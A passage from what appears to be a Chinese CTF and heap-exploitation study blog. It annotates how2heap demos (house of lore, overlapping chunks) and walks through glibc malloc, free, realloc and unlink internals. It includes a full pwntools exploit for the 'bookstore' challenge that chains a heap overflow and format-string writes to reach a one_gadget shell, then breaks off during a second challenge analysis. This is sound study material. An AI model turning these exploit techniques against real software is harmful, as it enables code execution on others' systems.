fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n");
fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");

void *p3 = malloc(100);


fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
char *p4 = malloc(100);
fprintf(stderr, "p4 = malloc(100)\n");

fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
stack_buffer_2[2]);

fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack
intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
memcpy((p4+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
}

说白了就是在栈上伪造出一个smallbin链里面的chunk来,然后把smallbin链中chunk的bk更改到栈上我们伪造的chunk处

这里在栈上伪造的chunk是这样的

header(fill 0)chunk1 header(fill 0)
fd=victim bk=chunk2
header(fill 0)chunk2 header(fill 0)
fd = chunk1↑ #这里没必要,只检查fd

这样,示例代码中连续两次通过vitcim->bk->fd的检查就可以把栈上的chunk1 malloc出来了,从而修改返回地址到shellcode

是一个比较简单的原理

overlapping_chunks_2.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
/*
Yet another simple tale of overlapping chunk.
This technique is taken from
https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf.

This is also referenced as Nonadjacent Free Chunk Consolidation Attack.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main(){

intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
int prev_in_use = 0x1;

fprintf(stderr, "\nThis is a simple chunks overlapping problem");
fprintf(stderr, "\nThis is also referenced as Nonadjacent Free Chunk Consolidation Attack\n");
fprintf(stderr, "\nLet's start to allocate 5 chunks on the heap:");

p1 = malloc(1000);
p2 = malloc(1000);
p3 = malloc(1000);
p4 = malloc(1000);
p5 = malloc(1000);

real_size_p1 = malloc_usable_size(p1);
real_size_p2 = malloc_usable_size(p2);
real_size_p3 = malloc_usable_size(p3);
real_size_p4 = malloc_usable_size(p4);
real_size_p5 = malloc_usable_size(p5);

fprintf(stderr, "\n\nchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1));
fprintf(stderr, "\nchunk p2 from %p to %p", p2, (unsigned char *)p2+malloc_usable_size(p2));
fprintf(stderr, "\nchunk p3 from %p to %p", p3, (unsigned char *)p3+malloc_usable_size(p3));
fprintf(stderr, "\nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4));
fprintf(stderr, "\nchunk p5 from %p to %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));

memset(p1,'A',real_size_p1);
memset(p2,'B',real_size_p2);
memset(p3,'C',real_size_p3);
memset(p4,'D',real_size_p4);
memset(p5,'E',real_size_p5);

fprintf(stderr, "\nLet's free the chunk p4.\nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4\n");

free(p4);

fprintf(stderr, "\nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2\nwith the size of chunk_p2 + size of chunk_p3\n");

*(unsigned int *)((unsigned char *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; //<--- BUG HERE

fprintf(stderr, "\nNow during the free() operation on p2, the allocator is fooled to think that \nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) \n");
fprintf(stderr, "\nThis operation will basically create a big free chunk that wrongly includes p3\n");
free(p2);

fprintf(stderr, "\nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunk\n");

p6 = malloc(2000);
real_size_p6 = malloc_usable_size(p6);

fprintf(stderr, "\nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and \nwe can overwrite data in p3 by writing on chunk p6\n");
fprintf(stderr, "\nchunk p6 from %p to %p", p6, (unsigned char *)p6+real_size_p6);
fprintf(stderr, "\nchunk p3 from %p to %p\n", p3, (unsigned char *) p3+real_size_p3);

fprintf(stderr, "\nData inside chunk p3: \n\n");
fprintf(stderr, "%s\n",(char *)p3);

fprintf(stderr, "\nLet's write something inside p6\n");
memset(p6,'F',1500);

fprintf(stderr, "\nData inside chunk p3: \n\n");
fprintf(stderr, "%s\n",(char *)p3);
}

这个代码就是我前面写overlapchunk1用到的,通过溢出修改chunk的size字段,然后就可以在free时free出一大块chunk(不过此时要注意free的检查)一般是设置扩充的chunk刚好在某个chunk头部,当然如果chunk里面有合适的size也可以使用,这个我也暂时不debug了后面回来一起写总结

_int_malloc(mstate av, size_t bytes)

  • 根据bytes参数计算要申请的chunk大小nb
  • 判断av是否为空,不为空跳过这一步,进入之后的流程
    • 直接通过nb和av用sysmalloc调用分配
      • 分配成功,返回分配区对应指针
      • 分配失败,返回0

fastbin↓

  • 调用get_max_fast()获得global_max_fast变量的值判断nb是否在fastchunk范围内,不是则略过这一步
    • 通过位移忽略nb低位来计算fastbin中的index,然后获取要分配的bin链头
    • 判断链头是否为null,为null则跳出fastbin操作
    • 否则从单链表取下该victim chunk
      • 判断fastbin_index (chunksize (victim)) != idx,如果该victim的index与本链不对应则报错结束
      • 指针转换chunk2mem,然后返回该指针

smallbin↓

  • 判断nb是否<MIN_LARGE_SIZE(Macro,非变量)
    • 是:
    • 位移忽略nb低位来计算smallbin中的index,然后获取要分配的bin链头
    • 如果bin链头的bk指向的不是自身则赋值bk给victim并进行以下操作,否则跳过(这里可以看出smallbin是从链尾开始取chunk的)
      • 如果判断victim为0则说明该arena需要初始化,调用malloc_consolidate,之后跳出该smallbin操作
      • 不为0说明该bin链有chunk,获取victim->bk指针bck
        • bck->fd != victim,则报错结束
        • 这里说明成功分配,根据victim和nb设置相邻前向chunk的prev_inuse位为1,然后从双向链表取下victim chunk,设置size字段然后chunk2mem,返回
    • 不是:
    • 位移忽略nb低位来计算对应largebin中的index
    • 如果fastbin中有chunk(通过av的标识位判断),调用malloc_consolidate

recently freed or remaindered chunks↓

  • 大循环###########################################################################
    • 嵌套循环(由unsortedbin中是否有chunk和最大遍历chunk数决定次数)↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
      • 如果unsortedbin头bk指针不为自身则赋值victim(同样是从链尾取chunk),否则退出第二层循环
      • 获取victim chunk的bk指针bck
      • 判断victim的size字段是否满足2*size_t < victim->size <= system_mem,不满足则报错结束
      • 如果满足(in_smallbin_range)(bck == unsorted_chunks ,即unsortedbin中只有一个chunk)(vicitm==last_remainder,即上次被切割的chunk)(size>nb+MINSIZE,MINSIZE是能够分配的最小chunk)这四个条件则进行以下操作(这里只是为了从unsortedbin唯一chunk,而且还是last_remainder中切割出smallbin)
        • 设置新的remainder,并链入unsortedbin
        • 如果remainder不是largebin需要将fd_nextsize和bk_nextsize清零
        • 设置victim的size字段(prev_inuse默认为1)
        • 设置remainder的size字段和更新前向chunk的prev_size字段
        • chunk2mem,返回切割下来的vicitm
      • 从unsorted chunk中取下该victim
      • 如果该victim的size==nb进行以下操作否则略过(刚好碰到unsortedbin中相等大小的chunk)
        • 设置victim前向chunk的prev_inuse为1
        • 设置vicitm的size字段
        • chunk2mem,返回vicitm
      • 通过in_smallbin_range判断victim的size(这个操作是为了将不满足的chunk链入bin链,判断只是在small chunk和large chunk上做不同的工作而已)
        • 满足:
          • 计算对应smallbin中的index
        • 不满足:
          • 说明是largechunk
          • 找到largebin中对应的index和bin链中的位置
        • 在binmap设置对应的index为1,说明该bin链有chunk
        • 将该chunk通过获得的fwd和bck链入bin链
      • 嵌套循环结尾↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
    • 通过in_smallbin_range判断nb,不是则进行以下操作,是则跳过(这里是去largebin中对应的index切割出chunk来,small chunk和largebin中对应bin链没有chunk的还得等到下面binmap去找)
      • 获取对应largebin中的bin链头作为victim
      • bin链中有chunk,并且victim的size大于等于nb则进行下一系列操作
        • 反向遍历chunk size链表,直到找到第一个大于等于所需chunk大小的chunk
        • 如果从 large bin 链表中选取的 chunk victim 不是链表中的最后一个 chunk,并且与 victim大小相同的chunk不止一个,那么意味着victim为chunk size链表中的节点,为了不调整chunksize 链表,需要避免将 chunk size 链表中的节点取出,所以取 victim->fd 节点对应的 chunk作为候选 chunk。由于 large bin 链表中的 chunk 也是按大小排序,同一大小的 chunk 有多个时,这些 chunk 必定排在一起,所以 victim->fd 节点对应的 chunk 的大小必定与 victim 的大小一样(这段我直接复制的华庭,因为涉及largebin的概念太多了)
        • 计算victim切割后的大小,并调用 unlink()宏函数将 victim 从 bin 链中取出 ※※
        • 判断切割后的大小是否小于MINSIZE(判断返回chunk之前要不要切一下)
          • 是,切割失败,不用切了,设置victim前向chunk的prev_inuse为1并设置victimsize字段
          • 否,切割成功,设置remainder
            • 检查unsortedbin链表头是否正常,不正常则报错结束
            • 重复将remainder链入unsortedbin中的操作(前面嵌套循环中打处)
        • chunk2mem,返回victim
    • 到这里便开始使用binmap分配(largebin和smallbin中对应index都没有chunk的)
    • 获取我们需要大小chunk对应bin的下一个bin的空闲chunk链表,并获取该bin对于binmap中的bit位的值 (开始从稍大的chunk中寻找)
    • 嵌套循环↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
      • 首先找到对应的binmap中对应的block(找不到则直接去use_top),然后找到block中的对应bit位和对应的bin链
      • 判断此时 victim 与 bin 链表头是否相同
        • 是:表示该 bin 中没有空闲 chunk, binmap 中的相应位设置不准确(接着找),将 binmap 的相应 bit 位清零, 获取当前 bin 下一个 bin,将 bit 移到下一个 bit位,回到前面循环↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
        • 否:当前 bin 中的最后一个 chunk 满足要求
          • 重复之前打※※处操作
      • 嵌套循环结尾↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
    • use_top:
      • 前面的全部都没找到则直接使用topchunk,获取topchunk的size
      • 如果size+MINSIZE>nb,则切出victim(此时不更改last_remainder),chunk2mem,返回victim
      • 如果top_chunk都不满足,判断此时是否有fastchunk
        • :调用malloc_consolidate,并计算nb对应bin的index
        • 没有:重复之前调用sysmalloc的流程
    • ###########################################################################

Free就从封装函数开始吧

__libc_free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
void
__libc_free (void *mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */

void (*hook) (void *, const void *) = atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
{
(*hook)(mem, RETURN_ADDRESS (0)); //有hook就先调用hook,和其他函数一样
return;
}

if (mem == 0) /* free(0) has no effect ,0直接return */
return;

p = mem2chunk (mem);

if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
/* see if the dynamic brk/mmap threshold needs adjusting */
if (!mp_.no_dyn_threshold
&& p->size > mp_.mmap_threshold
&& p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
{
mp_.mmap_threshold = chunksize (p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk (p);//如果是mmap分配的chunk就使用munmap,不调用_int_free,暂时不深究
return;
}
//一般的free流程
ar_ptr = arena_for_chunk (p);
_int_free (ar_ptr, p, 0);
}

_int_free (mstate av, mchunkptr p, int have_lock)

这里have_lock默认传入的是0

  • 先获取p的chunksize size,然后开始做检查
  • 检查1:p不能大于-size,p需要对齐,否则free(): invalid pointer报错结束
  • 检查2:size要大于MINSIZE,而且size要对齐,否则free(): invalid size报错结束

#下面的三个大块是if..else if..else…结构

  • 通过get_max_fast ()获取global_max_fast变量判断是否为fastchunk,是则进行以下操作(如果存在宏TRIM_FASTBINS,靠近topchunk的fastbin不会进入该流程)
    • 检查该chunk相邻的前向chunk的大小是否合法(是否满足2*size_t < size < system_men)
      • 不合法则free(): invalid next size (fast)报错结束
    • set_fastchunks(av),设置av中对应标识,代表此时有fastchunk了
    • 将bin链上已存在的chunk赋值到old,检查old是否和本chunk相等
      • 相等则double free or corruption (fasttop)报错结束
    • p->fd = old2 = old;加入bin链,并存下old2为后续表头操作
    • 接下来在有锁(have_lock=1)的条件下,保证表头指向的chunk所属的bin链与当前chunk所属的bin链相同
      • 不相同则invalid fastbin entry (free)报错结束
  • 这里,如果不是mmap分配的chunk则进行以下操作

    • 先加锁(free里面的锁操作好像很多)

    • 根据p和size计算nextchunk

    • 如果p是top_chunk则double free or corruption (top)报错结束

    • 如果nextchunk 的地址已经超过了 top chunk 的结束地址,超过了当前分配区的结束地址,double free or corruption (out)报错结束

    • 如果nextchunk的prev_inuse为0,又因为此时不是fastchunk。double free or corruption (!prev)报错结束

    • 获取nextchunk的nextsize,如果nextsize不满足2*size_t < nextsize < system_menfree(): invalid next size (normal)报错结束(这一步在前面fastbin中也做了)

    • 接着向后合并:

      • if (!prev_inuse(p)) {//通过prev_inuse判断如果相邻的后向chunk不在使用态
              prevsize = p->prev_size;//通过本chunk的prev_size段获取prevsize
              size += prevsize;
              p = chunk_at_offset(p, -((long) prevsize));//更新p到prevchunk
              unlink(av, p, bck, fwd);//对prevchunk进行unlink
            }//此处prev_size字段为0会怎么样?prev_size为负数会怎么样?修改偏移来实现任意unlink?
        <!--1-->
      • 检查unsortedbin中表头指针是否正常,不正常则free(): corrupted unsorted chunks报错结束

      • 如果size属于largebin,则将fd_nextsize,bk_nextsize置零

      • 将p加入unsortedbin头并设置size字段prev_inuse为1,并设置相邻前向chunk的prev_size为size

      • 直接链入topchunk,设置size字段prev_inuse为1

    • 如果当前分配区为主分配区,并且 top chunk 的大小大于 heap 的收缩阈值,调用 systrim()函数收缩 heap,不是主分配区的话,调用 heap_trim()函数收缩非主分配区的 sub_heap

  • 这里说明是mmap分配的区域,调用munmap

_int_realloc之前先做检查,如果传入的指针为NULL,就直接调用_int_malloc

如果传入的chunk不满足(uintptr_t) oldp > (uintptr_t) -oldsize,且也不是16bit对齐,报错结束

_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize, INTERNAL_SIZE_T nb)

检查oldp的size字段是否满足2*size_t < oldp.size < system_mem,不满足则报错结束

oldchunk不能是mmapped,否则报错结束

通过oldp和oldsize计算next和next size

检查next的size字段是否满足2*size_t < oldp.size < system_mem,不满足则报错结束

(下面开始if..else..流程)

  • oldsize>=nb?
    • 则准备从原chunk切割
    • newp=oldp,newsize=oldsize
  • :(newsize=oldsize+nextsize)
    • 如果前向chunk是topchunk且oldsize+topsize>nb+MINSIZE
      • 直接从topchunk切割出一部分补上去,设置新tophead,chunk2mem(oldp),完成退出
    • 如果前向chunk不是topchunk且未使用,并满足oldsize+nextsize>nb+MINSIZE
      • newp=oldp
      • unlink前向chunk
    • 前面两种情况都不是,则进行以下操作
      • 调用_int_malloc(av, nb - MALLOC_ALIGN_MASK),分配内存,这里nb - MALLOC_ALIGN_MASK是因为在_int_malloc里面还会再计算一遍nb。然后计算newp和newsize
      • newp == next?
        • 直接设置newp=oldp,不用复制内容了,扩充就好
        • 拷贝内容到新chunk
        • _int_free(av,oldp,1)

检查newsize是否>=nb,不满足则报错结束

计算remainder_size = newsize - nb

  • remainder_size<MINSIZE?
    • 直接设置头部,不用分割了
    • 分割出remainder,并设置其prev_inuse为1,接着调用_int_free(av,remainder,1)

返回chunk2mem,完成退出

unlink

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
unlink(AV, P, BK, FD)//P是指向本chunk的指针
{
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
malloc_printerr ("corrupted size vs. prev_size");
//检查本chunk的size和next chunk的prev_size段是否相等,排除了fast chunk

FD = P->fd;//P+0x10
BK = P->bk;//P+0x18 FD和BK分别指向forward chunk和back chunk

if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) //pass check
malloc_printerr ("corrupted double-linked list");
//检查前chunk的bk和后chunk的fd是否与P相等
else
{
FD->bk = BK;//0x6020b8+0x18=0x6020d0(small_ptr)=0x6020c0(big_ptr)
BK->fd = FD;//链表的卸下操作0x6020c0+0x10=0x6020d0(small_ptr)=0x6020b8(...)

if (!in_smallbin_range (chunksize_nomask (P))&&
__builtin_expect (P->fd_nextsize != NULL, 0))//当链表为large bin且fd_nextsize不为空
{
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))
malloc_printerr ("corrupted double-linked list (not small)");
//检查前chunk的bk_nextsize和后chunk的fd_nextsize是否与P相等

if (FD->fd_nextsize == NULL)
{
if (P->fd_nextsize == P) FD->fd_nextsize = FD->bk_nextsize = FD;
else
{
FD->fd_nextsize = P->fd_nextsize;
FD->bk_nextsize = P->bk_nextsize;
P->fd_nextsize->bk_nextsize = FD;
P->bk_nextsize->fd_nextsize = FD;
}
}
else
{
P->fd_nextsize->bk_nextsize = P->bk_nextsize;
P->bk_nextsize->fd_nextsize = P->fd_nextsize;
}
}
}
}

how2heap - overlapping_chunks&bookstore,night-deamonic-heap

ubuntu16.04 libc2.23

overlapping_chunks.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
/*
A simple tale of overlapping chunk.
This technique is taken from
http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main(int argc , char* argv[]){


intptr_t *p1,*p2,*p3,*p4;

fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "\nThis is a simple chunks overlapping problem\n\n");
fprintf(stderr, "Let's start to allocate 3 chunks on the heap\n");

p1 = malloc(0x100 - 8);
p2 = malloc(0x100 - 8);
p3 = malloc(0x80 - 8);

fprintf(stderr, "The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3);

memset(p1, '1', 0x100 - 8);
memset(p2, '2', 0x100 - 8);
memset(p3, '3', 0x80 - 8);

fprintf(stderr, "\nNow let's free the chunk p2\n");
free(p2);
fprintf(stderr, "The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n");

fprintf(stderr, "Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n");
fprintf(stderr, "For a toy program, the value of the last 3 bits is unimportant;"
" however, it is best to maintain the stability of the heap.\n");
fprintf(stderr, "To achieve this stability we will mark the least signifigant bit as 1 (prev_inuse),"
" to assure that p1 is not mistaken for a free chunk.\n");

int evil_chunk_size = 0x181;
int evil_region_size = 0x180 - 8;
fprintf(stderr, "We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n",
evil_chunk_size, evil_region_size);

*(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2

fprintf(stderr, "\nNow let's allocate another chunk with a size equal to the data\n"
"size of the chunk p2 injected size\n");
fprintf(stderr, "This malloc will be served from the previously freed chunk that\n"
"is parked in the unsorted bin which size has been modified by us\n");
p4 = malloc(evil_region_size);

fprintf(stderr, "\np4 has been allocated at %p and ends at %p\n", (char *)p4, (char *)p4+evil_region_size);
fprintf(stderr, "p3 starts at %p and ends at %p\n", (char *)p3, (char *)p3+0x80-8);
fprintf(stderr, "p4 should overlap with p3, in this case p4 includes all p3.\n");

fprintf(stderr, "\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3,"
" and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n");

fprintf(stderr, "Let's run through an example. Right now, we have:\n");
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);

fprintf(stderr, "\nIf we memset(p4, '4', %d), we have:\n", evil_region_size);
memset(p4, '4', evil_region_size);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);

fprintf(stderr, "\nAnd if we then memset(p3, '3', 80), we have:\n");
memset(p3, '3', 80);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
}

一个比较简单的oevrflow的示例

首先申请了3个chunk

0x100(p1)
0x100(p2)
0x80(p3)

当我们把0x100的chunk放入unsortedbin之后,模拟p1 overflow修改p2的size为0x180,再通过malloc(0x180-8)即可直接卸下unsortedbin中这个fake 0x180的chunk,达到overlap p3的目的

由于比较简单这里就没放debug的过程,直接开始撸题吧2333

bookstore

程序分析

程序比较简单

上来先malloc了三个0x90的small chunk

堆上的内容此时是这样的

order1 order2 malloc_dest
0x90 0x90 0x90

下面就是一个循环+switch的结构,循环由v4控制,v4为1后结束循环

1581675282813

结束循环之后存在格式化字符串漏洞,fmt为malloc_dest

edit

1581675013218

无长度检查,存在overflow,在输入的末尾\n处会改成\x00

free

1581675079810

free就是单纯的free,没有清零指针

submit

就是用order1和order2的内容来填充submit_chunk

Exploite

程序的chunk的是一开始就malloc好的,无法自己malloc,但是能自己free,当选择5之后可以malloc一个0x150大小的chunk,所以第一思路肯定是free chunk2后通过chunk1更改chunk2的size,然后申请submit_chunk时会返回chunk2的地址,由于submit_chunk比较大,会和malloc_dest形成overlapping,通过修改submit_chunk的内容,溢出到malloc_dest触发格式化字符串漏洞(这里选择时的s可以输入一个比较大的buffer,可以在buffer中填上指针来修改内容)。

因为overlap之后的拷贝操作是先把chunk1的内容拷贝到chunk2,然后再把chunk2的内容加到chunk2后面,所以要计算偏移,具体计算如上图注释,想要malloc_dest刚好放置我们的格式化串我们只需要满足chunk1中有0x74个Byte的内容即可

可是我找了一会之后发现,因为只能用一次格式化字符串,而且在之前也无法泄露,栈指针和libc都利用不了,只能用程序里面的,要么是GOT表,要么是其他可写的段,当然在这里我很自然的联想到了.fini段,这个段是程序结束之后要调用的函数指针,我可以修改它为main函数地址(不过只能利用一次),然后在修改.fini段的时候顺带把栈地址、libc地址一并泄露(只要到程序栈上找到就行)

1
2
3
4
5
6
7
delete(2)

payload1=(('%'+str(0xA39)+'c%13$hn|%19$p|%31$p').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
#下面的0x6011B8会放在%13$n处,%19$p是一个栈地址,%31$p是libc_start_main的返回地址,A39是main函数地址地位
edit(1,payload1)#溢出修改size

submit(0x6011B8)#选择时顺带填上地址,然后此时malloc的chunk就会overlap了

然后计算对应地址

1
2
3
ret_stack=int(p.recv(14),16)-0x18#stack address of ret
libc_base=int(p.recv(15).strip('|'),16)-0x20830
one=0x45216+libc_base#one_gadget

之后第二次利用与第一次相同,但是有一点,one_gaget的地址可能与第二次执行的返回地址有3个Byte不一样,那怎么办。所以第二次我们可以修改两次(为什么不是三次是因为三个字节的大小顺序可能会不一样,在使用%hhn写入的时候前面的输出会对后面产生影响,但是如果一次改两个字节%hn和一次改一个字节%hn就可以控制顺序了)

1
2
3
change1=one&0xffff
change2=one&0xff0000
change2=change2>>16

printf时我们写入的地址在栈上的偏移需要自己计算一下,地址也需要计算一下,因为此时的栈已经变了,不过偏移是固定的

1
2
3
4
5
6
delete(2)

payload1=(('%0'+str(change2)+'d%14$hhn|%0'+str(change1-change2-1)+'d%13$hn|').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
edit(1,payload1)

submit(ret_stack-0x110,ret_stack-0x110+2)#submit时填上两个地址

最终getshell

完整Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './books' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def edit(x,content):
p.recvuntil('5: Submit\n')
p.sendline(str(x))
p.recvuntil(' order:\n')
p.sendline(content)

def delete(x):
p.recvuntil('5: Submit\n')
if x == 1:
p.sendline('3')
else:
p.sendline('4')
def submit(address,address2=0):
p.recvuntil('5: Submit\n')
p.sendline(p64(0x35)+p64(address)+p64(address2))

delete(2)

payload1=(('%'+str(0xA39)+'c%13$hn|%19$p|%31$p').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
edit(1,payload1)

submit(0x6011B8)

p.recvuntil('|')
p.recvuntil('|')
p.recvuntil('|')
p.recvuntil('|')
p.recvuntil('|')
ret_stack=int(p.recv(14),16)-0x18
libc_base=int(p.recv(15).strip('|'),16)-0x20830
log.info("\033[1;36m" +'ret_stack:'+hex(ret_stack)+'\nlibc_base:'+hex(libc_base)+ "\033[0m")
one=0x45216+libc_base

change1=one&0xffff
change2=one&0xff0000
change2=change2>>16
log.info("\033[1;36m" +'one_gadget:'+hex(one)+"\033[0m")
log.info("\033[1;36m" +'change1:'+hex(change1)+'\nchange2:'+hex(change2)+ "\033[0m")

delete(2)

payload1=(('%0'+str(change2)+'d%14$hhn|%0'+str(change1-change2-1)+'d%13$hn|').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
edit(1,payload1)

submit(ret_stack-0x110,ret_stack-0x110+2)

p.interactive()

role_gaming

程序分析

因为第一次在pwn里面写到c++的程序,本来c++也不太好逆,就…稍微写的有点久?(以后逆向速度要加油~)

main

初始化:申请了一个0xA0(0xB0)大小的chunk,用来保存后面的指针

下面主要就是从栈上读取一个command,用来操作游戏,大小是0xFFF,会在输入结尾处改成0

new

1581908110687

最多允许new 0x13个character,其中character有两种类型:barbarian,wizzard,在C++里面来说就是,barbarian和wizard类从character继承而来。
申请barbarian的command格式为:“new barbarian ”+personnage,wizzard的格式为“new wizzard ”+personnage

每次创建前都会调用get_personnage,这个函数会调用strncmp判断command中的personnage和所有character对应chunk中的personnage,其中判断时的n用的是存在chunk上的那个记录,如果有重复的personnage,会直接申请失败

对比完之后开始创建character,其对应的chunk如下:
character:new 0xF8(0x100)
personnage:calloc 0x??(由输入决定)

barbarian:

wizzard:

两者的初始化基本都差不多,除了Vtable和一些值可能存在不同

delete

通过搜索personnage判断是否存在character
如果存在

  • free personnage,并将character chunk上的指针置零
  • delete character_ptr,并在对应记录上赋值为前一个character,character数量减一

help

1581910298728

打印帮助信息

change

格式为”change “+oldpersonnage+” “+newpersonnage

如果旧personnage长度大于新的,就直接strncpy到对应chunk去,如果小于则需要realloc

调用到对应类的虚函数来输出其内容

漏洞分析

(以后碰到复杂的题一定要先写漏洞分析)

chunks&内存操作

chunk:

  1. 初始用来存储的chunk,0xA0(0xB0)大小,new出来的chunk(new是调用malloc来实现的)
  2. character chunk,0xf8(0x100)大小,calloc出来的chunk
  3. personnage chunk,大小由我们控制,不过不能为0因为程序会自动加上一个’B’或者’W’,calloc出来的chunk,内存上申请时挨着character chunk

内存操作:

除了上面申请内存的地方还有释放内存时是先free(personnage),然后delete character chunk。在change里面还有一个realloc personnage

漏洞点:

初始化时,处理输入的personnage会先调用strlen计算len,然后calloc(len,1),接着存len+1在对应记录上
接着用strncpy(chunkptr + 1,ptr, len)从chunk的第2个字节处开始放置字符串

此处存在1Byte overflow

在change处,由于记录的len是加过1的,当我们输入的新personnage长度和记录长度相等时,也可以修改到后面一个字节

前面分析的时候顺带画了一个图方便自己看:

1581995268256

Exploit

exploit就也是堆上比较常见的构造了,这里我使用的方法是先用free modified chunk来leak内容,然后用malloc modified chunk来覆盖Vtable,具体为什么见下文

最开始的时候我申请了3个barbarian(a,b,c),此时如果使用a的overflow可以修改到b记录chunk的size低一字节,因为申请a的时候产生的overflow在topchunk上,所以不用管,主要是利用change时的overflow

0x100 0x20 0x100 0x?? 0x100 0x??
chunk for overflow
a a b b c c

然后我看到后面的chunk刚好大小可以设置在一个字节,所以就想能不能利用一个0x70的来fastbin attack,通过free overlap修改其fd,然而我当时没有考虑到的是,我们的chunk大小申请是通过输入的personnage长度来决定的,如果想使用修改fd来fastbin attack,当我改到fd时,这个chunk的size也被破坏了,因为0字节在初始化时就被截断了,根本无法实现,但是如果通过这个方法来extend a,从而达到泄露指针内容的话还是可以的。

我就先随便申请了5个barbarian(因为之前一直在构造的时候都畏手畏脚的,这次干脆先稍微弄多一点,冗余也没事,能在限制下写出来就行XD

0x100 0x20 0x100 0x60 0x100 0x60 0x100 0x60 0x100 0x60
a a b b c c d d e e

